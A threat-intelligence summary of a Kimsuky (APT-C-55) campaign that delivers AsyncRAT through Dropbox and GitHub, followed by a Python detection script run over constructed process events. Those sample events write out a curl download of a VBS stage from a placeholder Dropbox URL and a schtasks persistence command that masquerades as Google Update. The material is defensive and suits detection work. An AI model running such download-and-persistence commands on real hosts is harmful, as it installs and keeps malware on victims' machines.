Analysis of an APT-C-55 (Kimsuky) Attack Campaign Distributing Malicious Payloads via GitHub and Dropbox
2026-05-13 • Qihoo360 • Analysis of an APT-C-55 (Kimsuky) Attack Campaign Distributing Malicious Payloads via GitHub and Dropbox
Kimsuky, also tracked as APT-C-55 and BabyShark, is described as an espionage-focused actor that targets government, diplomatic, think tank, media, and academic organizations tied to the Korean Peninsula and other regions. The observed campaign begins with a phishing LNK file whose name mimics a Korean-language China CMG interview document. The LNK decrypts and opens a decoy document while using a copied curl binary to download taskschd.vbs from Dropbox. The VBS stage pulls a batch script from GitHub, which in turn downloads two PowerShell scripts, one from Dropbox and one from GitHub. The first PowerShell script creates a scheduled task named GoogleUpdateTaskMachineUA for persistence and uploads host information to GitHub; the second decrypts content from fox.png with a modified RC4 routine and reflectively loads a .NET payload identified as an AsyncRAT variant, used to steal sensitive information.
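As an added illustration (not from the Qihoo360 report), the following Python sketch turns the chain described above into host-based detection logic run over constructed Sysmon-style process-creation events: a curl binary executing from a user-writable path and fetching from Dropbox or GitHub, a script host launching a .vbs from Temp, and a schtasks /create that reuses the GoogleUpdateTaskMachineUA name but whose action is not GoogleUpdate.exe (the legitimate Google Update task of that name runs GoogleUpdate.exe). The paths, URLs, script names and the benign control event are constructed assumptions.

```python
import re

# Constructed Sysmon-style process-creation events; none of these values come from the report.
# Event 0: curl copied out of System32 fetches the VBS stage from Dropbox.
# Event 1: a script host runs the downloaded VBS from the user's Temp folder.
# Event 2: a scheduled task reusing the Google Update task name but running PowerShell.
# Event 3: benign control, the genuine Google Update task (should not alert).
SAMPLE_EVENTS = [
    {"image": r"C:\Users\alice\AppData\Local\Temp\curl.exe",
     "cmdline": r"curl.exe -o C:\Users\alice\AppData\Local\Temp\taskschd.vbs https://www.dropbox.com/scl/fi/EXAMPLE/taskschd.vbs?dl=1"},
    {"image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"wscript.exe C:\Users\alice\AppData\Local\Temp\taskschd.vbs"},
    {"image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks.exe /create /tn GoogleUpdateTaskMachineUA /tr "powershell.exe -File C:\Users\alice\AppData\Local\Temp\gu.ps1" /sc minute /mo 10 /f'},
    {"image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks.exe /create /tn GoogleUpdateTaskMachineUA /tr "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /ua" /sc daily'},
]

# Cloud hosts abused for staging in the described chain.
CLOUD_HOSTS = re.compile(r"https?://[^\s\"']*(dropbox\.com|github\.com|githubusercontent\.com)", re.I)
# Locations a copied curl would typically live in, as opposed to C:\Windows\System32.
USER_WRITABLE = re.compile(r"\\(Users|ProgramData|Temp)\\", re.I)
TEMP_VBS = re.compile(r"\\Temp\\[^\s\"]+\.vbs", re.I)
TASK_NAME = re.compile(r"/tn\s+\"?GoogleUpdateTaskMachineUA\b", re.I)
# /tr value, quoted or bare.
TASK_ACTION = re.compile(r"/tr\s+\"([^\"]+)\"|/tr\s+(\S+)", re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def check_event(ev: dict) -> list:
    """Return the list of rule names the event matches (empty if benign)."""
    hits, name, cmd = [], basename(ev["image"]), ev["cmdline"]
    if name == "curl.exe" and USER_WRITABLE.search(ev["image"]) and CLOUD_HOSTS.search(cmd):
        hits.append("relocated_curl_cloud_download")
    if name in ("wscript.exe", "cscript.exe") and TEMP_VBS.search(cmd):
        hits.append("script_host_temp_vbs")
    if name == "schtasks.exe" and re.search(r"/create\b", cmd, re.I) and TASK_NAME.search(cmd):
        m = TASK_ACTION.search(cmd)
        action = (m.group(1) or m.group(2)) if m else ""
        if "googleupdate.exe" not in action.lower():  # name reused, but action is not Google's binary
            hits.append("google_update_task_name_reuse")
    return hits


def scan(events: list) -> list:
    """Return (event index, rule name) pairs for every match across the events."""
    return [(i, rule) for i, ev in enumerate(events) for rule in check_event(ev)]


if __name__ == "__main__":
    for idx, rule in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}")
```

Each rule alone is noisy in isolation; correlating them within one session on the same host is what makes the chain stand out.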